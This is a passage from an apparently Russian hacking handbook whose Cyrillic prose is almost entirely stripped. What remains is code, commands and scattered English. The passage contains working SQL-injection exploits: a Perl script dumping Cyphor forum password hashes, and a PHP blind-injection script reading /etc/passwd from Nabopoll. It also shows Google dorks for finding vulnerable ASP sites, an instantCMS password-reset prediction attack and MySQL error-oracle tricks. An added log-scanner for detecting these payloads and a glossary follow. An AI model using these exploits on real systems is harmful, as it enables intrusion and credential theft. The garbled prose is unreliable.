. 3.3.
( ). cyphor ( README.
txt, ).
.

. 3.3. crack-pass.php

.
, .
email SQL-. , . ,
( ,
, ) , , . 3.4 ( brute-pass.php).

. 3.4. brute-pass.php

45 .
,
.
. 3.5. alice 118 .

. 3.5. brute-pass.php

( )
. , , ,
, (
).
,
, , . 5 ,
2 .
The matrix, :
-
. ,
instantCMS.
, , 8.
, , HTTP-.

,
Telnet ( 80) , :
telnet 127.0.0.1 80

GET / HTTP/1.1 Enter. -


, ,
. 3.6. , - ,
PHP. .

. 3.6. -


.
,
.
crack-pass.php.
, PHP , ,
( ,
*nix-,
admin, - ;
, ;
, John The Ripper).
, ,
.
. , SQL-, UPDATE,
3 ().
.
, !
.

,
?
, . ,
md5- , uname -a,
id, pwd, who, ps . . ( Cyphor *nix-),
, .

. - .


SQL Cyphor

, ,
http://www.securiteam.com/unixfocus/6P00F1FEKC.html.

- , ,
cyphor019.pl. , , $url, users cyphor_users. . , $url
, .
#!/usr/bin/env perl
#//-----------------------------------------------------------#
#// Cyphor Forum SQL Injection Exploit .. By HACKERS PAL
#// Greets For Devil-00 Abducter Almaster
#// http://WwW.SoQoR.NeT
#//-----------------------------------------------------------#
use strict;
use warnings;
use LWP::Simple;
print "\n#####################################################";
print "\n# Cyphor Forum Exploit By : HACKERS PAL #";
print "\n# Http://WwW.SoQoR.NeT #";
if (!$ARGV[0] || !$ARGV[1]) {
    print "\n# -- Usage: #";
    print "\n# -- perl $0 [Full-Path] 1 #";
    print "\n# -- Example: #";
    print "\n# -- perl $0 http://www.cynox.ch/cyphor/forum/ 1#";
    print "\n# Greets To Devil-00 Abducter almastar #";
    print "\n#####################################################\n";
    exit(0);
}
else {
    print "\n# Greets To Devil-00 Abducter almastar #";
    print "\n#####################################################\n";
    my $web = $ARGV[0];
    my $id  = $ARGV[1];
    # the injected id parameter: a UNION that returns nick and password hash of one user
    my $url = "show.php?fid=2&id=-10%20union%20select%20id,2,3,4,5,nick,password,8,id,10%20from%20cyphor_users%20where%20id=$id";
    my $site = "$web/$url";
    my $page = get($site) || die "[-] Unable to retrieve: $!";
    print "\n[+] Connected to: $ARGV[0]\n";
    print "[+] User ID is : $id ";
    # the nick is rendered inside <span class=bigh>, the hash inside <span class=message>
    if ($page =~ m/<span class=bigh>(.*?)<\/span>/) {
        print "\n[+] User Name is: $1\n";
    } else {
        print "\n[-] Unable to retrieve User Name\n";
    }
    if ($page =~ m/<span class=message>(.*?)<\/span>/) {
        print "[+] Hash of password is: $1\n";
    } else {
        print "[-] Unable to retrieve hash of password\n";
    }
}
print "\n\nGreets From HACKERS PAL To you :)\nWwW.SoQoR.NeT . . . You Are Welcome\n\n";
#finished

.
html-, <span class=bigh>
</span> ( ) , <span
class=message> </span> .

perl cyphor019.pl http://localhost/webexploitation_package_02/cyphor/ 1

, ,
( 1). . 4.1.

. 4.1. SQL- Cyphor


SQL-
.

SQL-
MS SQL Jet

,
.
1. Google:
site:.org inurl:.asp?id=
site:.com inurl:.aspx?=
site:.co.uk inurl:.asp?cid=

- .
2. , http://www.site.com
:
http://www.site.com/en/pressread.asp?id=563

. URL
, :
http://www.site.com/en/pressread.asp?id=563'

:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in
string in query expression 'id=563' ;'.
/en/includes/configdb.asp, line 23

, , AND+1=1:
http://www.site.com/en/pressread.asp?id=563+AND+1=1#

ASP #,
-- /*.

type mismatch Cint


, .
, ,
, . AND+1=0#:
http://www.site.com/en/pressread.asp?id=563+AND+1=0#


:
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted.
Requested operation requires a current record.
/en/pressread.asp, line 44

, ORDER BY . , , 10.
, :
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database
engine does not recognize '10' as a valid field name or expression.
/en/includes/configdb.asp, line 23

, 10 .
, . 7:
http://www.site.com/en/pressread.asp?id=563+AND+1=0+UNION+ALL+SELECT+
1,2,3,4,5,6,7#

:
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] Query input must contain
at least one table or query.
/en/includes/configdb.asp, line 23

, . :
http://www.site.com/en/pressread.asp?id=563+AND+1=0+UNION+ALL+SELECT+
1,2,3,4,5,6,7 FROM user#

, :
Microsoft OLE DB Provider for ODBC Drivers error '80040e37'
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database
engine cannot find the input table or query 'user'. Make sure it
exists and that its name is spelled correctly.
/en/includes/configdb.asp, line 23

, , , : user, users, admin, login, news, sysobjects, customers. ,


admin. ,
,
, , 4 :
http://www.site.com/en/pressread.asp?id=563+AND+1=0+UNION+ALL+SELECT+
1,2,3,4,5,6,7+from+admin#


3. , GROUP
BY ... HAVING, :
HAVING 1=1 --
GROUP BY -.-----1 HAVING 1=1 --
GROUP BY -.-----1, -.-----2 HAVING 1=1 --
GROUP BY -.-----1, -.-----2, ... ----- (n) HAVING 1=1 --


nabopoll.php

06, , .
, .
, . :
<?php
# Nabopoll Blind SQL Injection P0C Exploit
# Download: www.nabocorp.com/nabopoll/
# coded by s0cratex
# Contact: s0cratex@hotmail.com
# July 1, 2010 modified by Uri
error_reporting(0);
ini_set("max_execution_time", 0);
$srv = "localhost"; $path = "/webexploitation_package_02/nabopoll";
$port = 80;
$survey = "1"; // you can verify the number entering in the site
               // and viewing the results...
echo "==================================================\n";
echo "Nabopoll SQL Injection -- Modified Exploit\n";
echo "--------------------------------------------------\n\n";
echo " -- /etc/passwd: \n";
$j = 1; $user = ""; $x = 0; $bingo = false;
// one byte of the file per outer iteration, until a NUL byte is read back
while (!strstr($user, chr(0))) {
    $minx = 0; $maxx = 255;
    $found = false; $op = ">";
    // narrow the byte value with ">" / "<=" questions until one value is left
    while (!$found) {
        $x = intval(($maxx + $minx) / 2);
        if ($maxx == $minx + 1) {
            if ($op == ">") { $x = $maxx; $found = true; $user .= chr($x); echo chr($x); break; }
            if (($op == "<=") and ($bingo)) { $x = $maxx; $found = true; $user .= chr($x); echo chr($x); break; }
        }
        $bingo = false;
        // blind condition on the j-th byte of /etc/passwd (0x2f6574632f706173737764)
        $xpl = "/result.php?surv=" . $survey . "/**/AND/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(load_file(0x2f6574632f706173737764)," . $j . ",1))" . $op . $x . "),1,0)))/*";
        $cnx = fsockopen($srv, $port);
        fwrite($cnx, "GET " . $path . $xpl . " HTTP/1.0\r\n\r\n");
        // the word "power" in the response is the true/false oracle (ereg() is gone in PHP 7, so strpos() is used)
        while (!feof($cnx)) {
            $line = fgets($cnx);
            if ($line !== false && strpos($line, "power") !== false) { $bingo = true; break; }
        }
        fclose($cnx);
        if ($x == 255) { die("\n Try again..."); }
        if ($bingo) {
            switch ($op) {
                case ">":  $minx = $x; break;
                case "<=": $maxx = $x; break;
            }
        } else {
            switch ($op) {
                case ">":  $op = "<="; break;
                case "<=": $op = ">";  break;
            }
        }
    }
    $j++;
}
echo "\n";
?>

, , - ( , , $xpl=),
.


SQL- MS Access

:
[...] AND (SELECT TOP 1 1 FROM _)

:
[...] AND (SELECT TOP 1 1 FROM users)

:
AND (SELECT TOP 1 _ FROM _)

:
[...] AND (SELECT TOP 1 name FROM users)

:
[...] AND IIF((SELECT TOP 1 LEN(_) FROM _ = X, 1, 0)

:
[...] AND IIF((SELECT TOP 1 LEN(name) FROM users) = 8, 1, 0)

:
[...] AND IIF((SELECT TOP 1 MID(_, X, 1)
FROM _) = CHR(XXX), 1, 0)

:
[...] AND IIF((SELECT TOP 1 MID(name, 1, 1)
FROM users ) = CHR(65), 1, 0)


instantCMS

The matrix,
,
.

https://forum.antichat.ru/showpost.php?p=2138088&postcount=23

, ,
http://ifolder.ru/17669676
http://webfile.ru/4490132

.
( ) .
? /components/registration/frontend.php PHP:
$sql = "SELECT * FROM cms_users WHERE email = '$email' LIMIT 1";
$result = $inDB->query($sql) ;
if ($inDB->num_rows($result)>0){
    $usr = $inDB->fetch_assoc($result);
    // the new password is the first 6 hex digits of md5(microtime()): it depends only
    // on the current second (visible in the Date header) and the microsecond part
    $newpassword = substr(md5(microtime()), 0, 6);
    $inDB->query("UPDATE cms_users SET password = '".md5($newpassword)."' WHERE id = ".$usr['id']) ;
    $mail_message = $_LANG['HELLO'].', ' . $usr['nickname'] . '!'. "\n\n";
    $mail_message .= $_LANG['REMINDER_TEXT'].' "'.$inConf->sitename.'".' . "\n\n";
    $mail_message .= $_LANG['OUR_PASS_IS_MD5'] . "\n";
    $mail_message .= $_LANG['OUR_PASS_IS_MD5_TEXT'] . "\n\n";
    $mail_message .= '########## '.$_LANG['YOUR_LOGIN'].': ' .$usr['login']. "\n\n";
    $mail_message .= '########## '.$_LANG['YOUR_NEW_PASS'].': ' .$newpassword . "\n\n";
    $mail_message .= $_LANG['YOU_CAN_CHANGE_PASS']."\n";
    $mail_message .= $_LANG['IN_CONFIG_PROFILE'].': '. cmsUser::getProfileURL($usr['login']) . "\n\n";
    $mail_message .= $_LANG['SIGNATURE'].', '. $inConf->sitename . ' ('.HOST.').' . "\n";
    $mail_message .= date('d-m-Y (H:i)');
    $inCore->mailText($email, $inConf->sitename.' '.$_LANG['REMINDER_PASS'], $mail_message);
}

.
?
1. , .
2. , ,
, microtime().
microtime() .
,
gettimeofday().
msec sec, sec , Unix (The Unix Epoch, 1 1970, 00:00:00 GMT),
msec . - :
0.xxxxxx00 [1273589840]

xxxxxx ,
, Unix.
?
, .
- :
Tue, 11 May 2010 20:39:23 GMT

, 1970, 00:00:00
GMT.
, . 0.xxxxxx00 ( , Unix
). :
0.30001200 1273589840

xxxxxx
( ).
substr(md5(), 0, 6)

md5- , :
1a512b


1 . .
-.
. ,
11 : 1000000/11=90.909 . , ,
.
, 100-,
. ,
.


SQL-

() ,
SQL-.
, ,
(, md5 ). ,
, .
, ,
,
/etc/passwd. , . ,
( )
, ,
. , ,
. , ,
, , .
/etc/passwd
. , , (, ,
/etc/passwd ,
, ).
, ,
SQL-,
.


find_in_set(substr, strlist)
MySQL find_in_set(), , .
, . ,


0. MySQL ( 'c' 'a,b,c,d,e'):


mysql> SELECT FIND_IN_SET('c','a,b,c,d,e');
        -> 3

md5- :
'0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f'

:
select find_in_set((substring((select password from users
limit 1),1,1)),'0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f');

, 'a' 11. ,
1 16,
:
news.php?id=find_in_set(substring((select password from users
limit 0,1),1,1),'0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f')

,
.
.
1.
( , ).
2. find_in_set()
.
3. , , .
: 32+16 md5-.
find_in_set() : INSTR(),
LOCATE(), ASCII(), ORD(), ASCII() ORD() , MySQL.
.
:
 ;
 ,
.
:
 ,
;
 ,
, .


find_in_set() + more1row
,
(, ).
Elekt.
, SQL-.
( podkashey)
SELECT 1 UNION SELECT 2


Subquery returns more than 1 row

ZaCo :
"x" regexp concat("x{1,25", if(@@version<>5, "5}", "6}")) /* else */

MySql, 5,
#1139 Got error 'invalid repetition count(s)' from regexp.

9 ,
regexp, 11
, .
SELECT 1 .
:
select if(1=1,(select 1 union select 2),2)
#1242 Subquery returns more than 1 row
select 1 regexp if(1=1,"x{1,0}",2)
#1139 Got error 'invalid repetition count(s)' from regexp
select 1 regexp if(1=1,"x{1,(",2)
#1139 Got error 'braces not balanced' from regexp
select 1 regexp if(1=1,'[[:]]',2)
#1139 Got error 'invalid character class' from regexp
select 1 regexp if(1=1,'[[',2)
#1139 Got error 'brackets ([ ]) not balanced' from regexp
select 1 regexp if(1=1,'(({1}',2)
#1139 Got error 'repetition-operator operand invalid' from regexp
select 1 regexp if(1=1,'',2)
#1139 Got error 'empty (sub)expression' from regexp
select 1 regexp if(1=1,'(',2)
#1139 Got error 'parentheses not balanced' from regexp
select 1 regexp if(1=1,'[21]',2)
#1139 Got error 'invalid character range' from regexp
select 1 regexp if(1=1,'[[.ch.]]',2)
#1139 Got error 'invalid collating element' from regexp
select 1 regexp if(1=1,'\\',2)
#1139 Got error 'trailing backslash (\)' from regexp


find_in_set(). , , , 0.
:
select * from users where id=-1 AND "x" regexp concat(
"x{1,25", if(find_in_set(substring((select passwd from users
where id=1),1,1),'a,b,c,d,e,f,1,2,3,4,5,6')>0, (
select 1 union select 2), "6}"))

'a,b,c,d,e,f,1,2,3,4,5,6',
:
#1242 Subquery returns more than 1 row


#1139 Got error 'invalid repetition count(s)' from regexp

, . , .
md5- , [0-9, a-f]. ,
12 (11 , ). , :
[1]: '0','b','c','d','e','f'
[2]: '1'
[3]: '2'
[4]: '3'
[5]: '4'
[6]: '5'
[7]: '6'
[8]: '7'
[9]: '8'
[10]: '9'
[11]: 'a'

, ,
, .
2- 11-,
. 1,
-
:
[1]: '0'
[2]: 'b'
[3]: 'c'
[4]: 'd'
[5]: 'e'
[6]: 'f'

SQL .


1. .
2. ,
.
3. , , , ,
1.
, , ,
[a-z, A-Z, 0-9] 11
.
,
,
,
.
, 42 md5-.
:
 ;
 .
, ,
.
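A defender-side counterpart to the injection techniques collected in this and the preceding chapters (the UNION/concat dump against show.php, the find_in_set() character oracle and the regexp "more1row" trick, load_file() of /etc/passwd, the MS Access IIF/TOP 1 probes and the verbose ODBC/Jet error pages): an added example, not code from the book or from any of the products it discusses, that normalises request URIs from Apache-style access logs and flags those signatures, and separately flags the database error strings quoted in the text that make error-based injection possible. The signature names, the host address and the sample log lines are constructed; the URIs reuse the book's payloads.

```python
import re
from urllib.parse import unquote_plus

# Request-side indicators built from this chapter's payloads (UNION/concat dump,
# find_in_set() oracle, regexp "more1row" trick, load_file(), Access IIF probes).
REQUEST_SIGNATURES = {
    "union-select":      re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "find_in_set-blind": re.compile(r"\bfind_in_set\s*\(\s*substr"),
    "regexp-more1row":   re.compile(r"\bregexp\s+concat\s*\("),
    "load_file":         re.compile(r"\bload_file\s*\("),
    "access-iif-probe":  re.compile(r"\biif\s*\(\s*\(\s*select\s+top\s+1\b"),
    "quote-probe":       re.compile(r"=\d+'(?:\s|$|&)"),
}

# Verbose DB errors quoted in the text: error-based injection uses them as its
# oracle, so a response body that contains one is worth an alert (and a fix).
RESPONSE_SIGNATURES = ("Microsoft OLE DB Provider for ODBC Drivers error",
                       "Microsoft Jet database engine",
                       "Subquery returns more than 1 row", "from regexp")

def normalise(uri):
    # URL-decode, turn /**/ comments into spaces, collapse whitespace, lower-case
    s = re.sub(r"/\*.*?\*/", " ", unquote_plus(uri))
    return re.sub(r"\s+", " ", s).lower()

def scan_request(uri):
    norm = normalise(uri)
    return [name for name, rx in REQUEST_SIGNATURES.items() if rx.search(norm)]

def scan_response(body):
    return [sig for sig in RESPONSE_SIGNATURES if sig in body]

def scan_access_log(lines):
    # (URI, matched signatures) for every Apache-style request line that hits
    hits = []
    for line in lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        names = scan_request(m.group(1)) if m else []
        if names:
            hits.append((m.group(1), names))
    return hits

# Constructed sample log lines (not from the book); the URIs reuse its payloads.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/May/2010:20:39:23 +0000] "GET /cyphor/show.php?fid=-1%20union%20select%201,concat(nick,0x3a,password),3,%27msg_test%27%20from%20cyphor_users HTTP/1.1" 200 512',
    '10.0.0.5 - - [11/May/2010:20:39:24 +0000] "GET /nabopoll/result.php?surv=1/**/AND/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(load_file(0x2f6574632f706173737764),1,1))>127),1,0)))/* HTTP/1.0" 200 2048',
    '10.0.0.5 - - [11/May/2010:20:39:25 +0000] "GET /news.php?id=-1+AND+%22x%22+regexp+concat(%22x{1,25%22,if(find_in_set(substring((select+passwd+from+users+where+id=1),1,1),%27a,b,c%27)>0,(select+1+union+select+2),%226}%22)) HTTP/1.1" 200 300',
    '10.0.0.5 - - [11/May/2010:20:39:26 +0000] "GET /en/pressread.asp?id=563%27 HTTP/1.1" 500 740',
    '10.0.0.5 - - [11/May/2010:20:39:27 +0000] "GET /en/pressread.asp?id=563 HTTP/1.1" 200 9100',
]
```

Running scan_access_log(SAMPLE_LOG) flags the first four lines and leaves the plain pressread.asp request alone; the same normalisation step is what lets a rule survive the %20, + and /**/ spacing variants shown on the page.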

10

.
,
. , ,
.
, (,
, ).
0-day ,
.
0- . -.
jtr . .
(abend, aborption end) .
(abort) () .
(abuse) .
,
,
.
(admin) .
. .
(account) , .
. .
(, ) ICQ (--), .
, (black hat) , .
.
.


FreeBSD ( BSD, NetBSD OpenBSD).


, (white hat) , ,
, . .
Windows.
.
(vire) .
Hydra.
, (gray hat, grey hat) , ,
.
(Distributed Denial of Service, DDoS)
.
( dedicated) .
John The Ripper.
. .
, , .
(Denial of Service, DoS) .
.
Java ( ).
, JavaScript.
DoS-.
( use) .
(inject) , . .
(include) .
(including) . .
(include) .
(injection) , , , .
(IRC) .
, .
.
() (keyboard) .
(keygen) .
.


(code) , -
.
(coding) .
.
(core) .
netcat.
(crack) , - .
(cool hacker) ( ).
(lamer) , ;
, .
(.) Linux.
(log) ( ).
(log-wiper) , (. ).
(login) .
.
( must die) - , ; MS Windows.
(malware) .
. .
(manual) ( -, ).
(must have) - , .
, .
(mIRC) .
.
MySQL.
(mail) , e-mail.
.
.
netcat (nc).
(nick, nickname) .
Unix- .


(null) , , .
- (null-byte, 0-byte) .
(nuke) , .
. .
.
(OS) , .
(public sploit) , , , 0-day sploit.
(pass, password) .
, Python Python.
OS/2 IBM (
).
( to root)
.
( use) .
( use) , .
, -.
PHP PHP.
(root) *nix-.
root.
.
, SunOS.
.
, (secure) .
.
. .
,
.
.
. .
(script-kiddie) -,
, , .
. .
, SQL.


, (sniffer) , - (,
cookie).
, Solaris.
(soft) , .
.
.
, (sploit) .
.
. .
ICQ (. ).
(tips) , .
(tricks) ( ).
. .
.
., . .
Linux ( ).
(user identification number, UIN) ICQ.
, .
(Frequently Asked Questions, FAQ) .
(phishing)
.
, (flood) .
FreeBSD.
. .
(hack) .
(hacking) ,
-.
.
. .
(host) , , .
.
.
. .


- (Internet worm), .
(shell) .
ICQ, .
(exploit) , .
( use) , . , , .
. .
(user) .
. .


-: (+DVD)




23.11.10. 70100/16. . . . 14,19. 1500. 0000.

